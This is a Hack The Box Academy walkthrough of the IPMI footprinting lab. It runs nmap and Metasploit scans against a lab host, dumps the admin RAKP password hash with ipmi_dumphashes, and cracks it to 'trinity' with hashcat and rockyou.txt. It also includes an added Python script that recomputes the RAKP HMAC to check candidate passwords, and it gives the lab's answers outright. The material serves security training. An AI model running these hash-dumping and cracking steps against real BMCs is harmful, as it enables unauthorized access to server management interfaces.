Hack The Box: Complete walkthrough of the IPMI (Intelligent Platform Management Interface) Footprinting lab module.

Solution to the HTB Intelligent Platform Management Interface Footprinting lesson

The Hack The Box (HTB) Intelligent Platform Management Interface (IPMI) module teaches you how to analyze and potentially exploit the target via IPMI. Here’s how to derive the solution and capture the flag.

Your directions in this exercise are to answer two questions: (1) What username is configured for accessing the host via IPMI? (2) Use hashcat to crack the password: what is the account’s cleartext password? Fire up the provided Pwnbox virtual machine and open a terminal.

IPMI, or Intelligent Platform Management Interface, is a standardized set of specifications for hardware-based platform management systems that enable centralized, remote control and monitoring of servers, independent of the server’s operating system, firmware, or even whether the server is powered on.

Key Features and Functions of IPMI

IPMI operates independently of the main system’s CPU, BIOS/UEFI, and OS, allowing system administrators to manage servers even if the machine is powered off or unresponsive. At the core of IPMI is a dedicated microcontroller called the BMC, which monitors hardware health (temperature, voltage, fan speeds), manages power (remote on/off/reset), logs system events, and provides remote access capabilities.

Administrators can perform tasks such as remotely installing an operating system, accessing the BIOS, rebooting the server, and mounting virtual media (like ISO images) for installations—all without physical access to the machine.

IPMI continuously monitors server health and can send alerts or log critical events, helping prevent or quickly resolve hardware failures.

Industry Support

IPMI is widely supported by major hardware vendors, including Cisco, Dell, Hewlett Packard Enterprise, and Intel, and has become a standard feature in most modern server hardware.

Footprinting the Service

IPMI communicates over UDP port 623. The controllers that implement the IPMI protocol are known as Baseboard Management Controllers (BMCs). BMCs are commonly implemented as embedded ARM systems running Linux, and they are connected directly to the host motherboard.

If we can gain access to a BMC during an assessment, we will have full access to the host motherboard, allowing us to monitor, reboot, power off, or even reinstall the host operating system. Many BMCs, including HP iLO, Dell DRAC, and Supermicro IPMI, provide a web-based management console, as well as a command-line remote access protocol such as Telnet or SSH. Port 623 UDP is specifically designated for the IPMI network protocol.

Get the IPMI version with nmap

To begin, scan the target with nmap and the ipmi-version script, as the lesson demonstrates. The scan confirms that the service is listening on UDP port 623, although in this run the script itself returned no version details.

sudo nmap -sU --script ipmi-version -p 623 10.129.169.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-22 09:16 CDT
Nmap scan report for 10.129.169.168
Host is up (0.065s latency).

PORT    STATE SERVICE
623/udp open  asf-rmcp

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds

Get the IPMI version using Metasploit

We can also get the IPMI version using the Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version). This module tends to return better results than the nmap script; here it reports the protocol version and the supported authentication types that the nmap scan did not.

msfconsole
Metasploit tip: Save the current environment with the save command, 
future console restarts will use this environment again
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.4.43-dev                          ]
+ -- --=[ 2483 exploits - 1279 auxiliary - 393 post       ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> use auxiliary/scanner/ipmi/ipmi_version
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> set rhosts 10.129.169.168
rhosts => 10.129.169.168
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> show options

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each
                                         set
   RHOSTS     10.129.169.168   yes       The target host(s), see https://docs.
                                         metasploit.com/docs/using-metasploit/
                                         basics/using-metasploit.html
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> run
[*] Sending IPMI requests to 10.129.169.168->10.129.169.168 (1 hosts)
[+] 10.129.169.168:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

From our scan, we find the service is IPMI 2.0.

Use Metasploit to capture the IPMI password hash

Next, use the Metasploit module auxiliary/scanner/ipmi/ipmi_dumphashes to see whether we can enumerate any users and capture a hash of their password.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> use auxiliary/scanner/ipmi/ipmi_dumphashes
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> set rhosts 10.129.169.168
rhosts => 10.129.169.168
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name               Current Setting    Required  Description
   ----               ---------------    --------  -----------
   CRACK_COMMON       true               yes       Automatically crack common
                                                   passwords as they are obtai
                                                   ned
   OUTPUT_HASHCAT_FI                     no        Save captured password hash
   LE                                              es in hashcat format
   OUTPUT_JOHN_FILE                      no        Save captured password hash
                                                   es in john the ripper forma
                                                   t
   PASS_FILE          /usr/share/metasp  yes       File containing common pass
                      loit-framework/da            words for offline cracking,
                      ta/wordlists/ipmi             one per line
                      _passwords.txt
   RHOSTS             10.129.169.168     yes       The target host(s), see htt
                                                   ps://docs.metasploit.com/do
                                                   cs/using-metasploit/basics/
                                                   using-metasploit.html
   RPORT              623                yes       The target port
   SESSION_MAX_ATTEM  5                  yes       Maximum number of session r
   PTS                                             etries, required on certain
                                                    BMCs (HP iLO 4, etc)
   SESSION_RETRY_DEL  5                  yes       Delay between session retri
   AY                                              es in seconds
   THREADS            1                  yes       The number of concurrent th
                                                   reads (max one per host)
   USER_FILE          /usr/share/metasp  yes       File containing usernames,
                      loit-framework/da            one per line
                      ta/wordlists/ipmi
                      _users.txt


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> run
[+] 10.129.169.168:623 - IPMI - Hash found: admin:212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Our Metasploit module reports:

Hash found: admin:212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c

It also supplies the answer to the first question: the username configured for accessing the host via IPMI is “admin”.

Copy the password hash (everything after “admin:”) into a file named hashed.txt.

Crack the IPMI password hash

The lesson mentions a flaw in the RAKP protocol used by IPMI 2.0. During the authentication handshake, the BMC sends the client a salted SHA1 or MD5 hash (an HMAC keyed with the user’s password) before the client has authenticated. This can be leveraged to obtain the password hash of ANY valid user account on the BMC. These hashes can then be cracked offline with a dictionary attack using hashcat mode 7300. If the target is an HP iLO still using its factory default password, the lesson suggests the hashcat mask attack hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u, which tries every eight-character combination of digits and upper-case letters (the -1 ?d?u option defines that custom charset).
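To make the RAKP weakness concrete, here is an added Python example (my own code, not part of the HTB lesson or the walkthrough) that works on the hash line Metasploit printed above. It splits the hex “salt” into the RAKP message fields the BMC’s HMAC covers (session IDs, both random values, the BMC GUID, the requested role byte, the username length and the username itself), then recomputes HMAC-SHA1 keyed with a candidate password over that salt, which is the same computation hashcat mode 7300 performs. The field layout is the IPMI 2.0 RAKP message 2 layout as I understand it and the mini-wordlist is constructed for the demonstration; nothing here talks to a BMC, it only checks material already captured.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# The hash line exactly as Metasploit's ipmi_dumphashes module printed it on this page.
# Format: <username>:<RAKP salt, hex>:<HMAC-SHA1, hex>. The part after "admin:" is what
# goes into hashed.txt for hashcat -m 7300.
CAPTURED_LINE = (
    "admin:"
    "212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273"
    "a123456789abcdefa123456789abcdef140561646d696e"
    ":181c6968e6133f1d2d1e1f0823b15cef59dde89c"
)

# RAKP message 2 fields covered by the BMC's HMAC, in order (assumed layout):
# remote-console session ID (4), BMC session ID (4), console random (16),
# BMC random (16), BMC GUID (16), requested role (1), username length (1), username.
_FIXED_LAYOUT = (
    ("console_session_id", 4),
    ("bmc_session_id", 4),
    ("console_random", 16),
    ("bmc_random", 16),
    ("bmc_guid", 16),
    ("role", 1),
    ("username_len", 1),
)


def parse_rakp_salt(salt_hex: str) -> dict:
    """Decode the RAKP salt so the captured material can be sanity-checked."""
    data = bytes.fromhex(salt_hex)
    fields, offset = {}, 0
    for name, size in _FIXED_LAYOUT:
        chunk = data[offset:offset + size]
        fields[name] = chunk[0] if size == 1 else chunk.hex()
        offset += size
    name_len = fields["username_len"]
    if offset + name_len != len(data):
        raise ValueError("salt length does not match the username length byte")
    fields["username"] = data[offset:offset + name_len].decode("ascii", errors="replace")
    return fields


def rakp_hmac_sha1(password: str, salt_hex: str) -> str:
    """HMAC-SHA1 keyed with the password over the salt: what hashcat -m 7300 computes.
    HMAC zero-pads keys shorter than its 64-byte block, so the zero-padded 20-byte key
    RAKP specifies gives the same digest as the raw password string."""
    return hmac.new(password.encode("utf-8"), bytes.fromhex(salt_hex), hashlib.sha1).hexdigest()


def verify_candidate(password: str, salt_hex: str, expected_hex: str) -> bool:
    return hmac.compare_digest(rakp_hmac_sha1(password, salt_hex), expected_hex.lower())


def split_hash_line(line: str) -> Tuple[str, str, str]:
    """Accept 'user:salt:hmac' (Metasploit console output) or 'salt:hmac' (hashed.txt)."""
    parts = line.strip().split(":")
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    if len(parts) == 2:
        return parse_rakp_salt(parts[0])["username"], parts[0], parts[1]
    raise ValueError("unrecognised hash line")


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary check of one captured RAKP hash, mirroring hashcat -m 7300 with a wordlist."""
    _, salt_hex, expected = split_hash_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if verify_candidate(candidate, salt_hex, expected):
            return candidate
    return None


if __name__ == "__main__":
    user, salt_hex, _ = split_hash_line(CAPTURED_LINE)
    fields = parse_rakp_salt(salt_hex)
    print(f"username on line: {user}; username inside salt: {fields['username']}; "
          f"role byte: {fields['role']:#x}; BMC GUID: {fields['bmc_guid']}")
    # Constructed three-word list; the page's hashcat run over rockyou.txt found "trinity".
    print("result:", crack(CAPTURED_LINE, ["123456", "password", "trinity"]))
```

To run it against the real wordlist, open rockyou.txt with encoding="latin-1" (it contains bytes that are not valid UTF-8) and pass the file object to crack(). The parser is also a useful defensive check: the role byte 0x14 (administrator with the lookup flag) and the username embedded in the salt show exactly which account and privilege level the BMC disclosed a keyed hash for, which is the information an incident responder wants when deciding which credentials to rotate.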

You can try the mask attack above, but it will likely take longer than the lifetime of your virtual machine. Instead, use a password wordlist such as rockyou.txt. Exit Metasploit and use wget to download rockyou.txt into your current directory.

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
--2025-06-22 10:06:23--  https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Resolving github.com (github.com)... 140.82.113.3
Connecting to github.com (github.com)|140.82.113.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/97553311/d4f580f8-6b49-11e7-8f70-7f460f85ab3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250622%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250622T150623Z&X-Amz-Expires=1800&X-Amz-Signature=d23f4df3521b050b67c83e01b16f410925c44b370913ac0d51f027c1da303441&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drockyou.txt&response-content-type=application%2Foctet-stream [following]
--2025-06-22 10:06:23--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/97553311/d4f580f8-6b49-11e7-8f70-7f460f85ab3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250622%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250622T150623Z&X-Amz-Expires=1800&X-Amz-Signature=d23f4df3521b050b67c83e01b16f410925c44b370913ac0d51f027c1da303441&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drockyou.txt&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 139921497 (133M) [application/octet-stream]
Saving to: ‘rockyou.txt’

rockyou.txt         100%[===================>] 133.44M   310MB/s    in 0.4s    

2025-06-22 10:06:24 (310 MB/s) - ‘rockyou.txt’ saved [139921497/139921497]

┌─[us-academy-3]─[10.10.15.62]─[htb-ac-1915373@htb-tt0plfupru]─[~]
└──╼ [★]$ ls
cacert.der  Documents  hashed.txt  Pictures  rockyou.txt  Videos
Desktop     Downloads  Music       Public    Templates

Now we can use hashcat to crack the password. Mode 7300 (IPMI2 RAKP HMAC-SHA1) matches the format Metasploit produced; we pass our hashed.txt file containing the hash and the wordlist (rockyou.txt) we wish to use.

┌─[us-academy-3]─[10.10.15.62]─[htb-ac-1915373@htb-tt0plfupru]─[~]
└──╼ [★]$ hashcat -m 7300 hashed.txt rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c:trinity
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7300 (IPMI2 RAKP HMAC-SHA1)
Hash.Target......: 212095048200000001ac14f88d63dc0af7a462e47b29386d4d9...dde89c
Time.Started.....: Sun Jun 22 10:06:44 2025 (0 secs)
Time.Estimated...: Sun Jun 22 10:06:44 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1433.2 kH/s (0.48ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344384 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1

Started: Sun Jun 22 10:06:42 2025
Stopped: Sun Jun 22 10:06:45 2025

The cracked password is “trinity”, which answers the second question.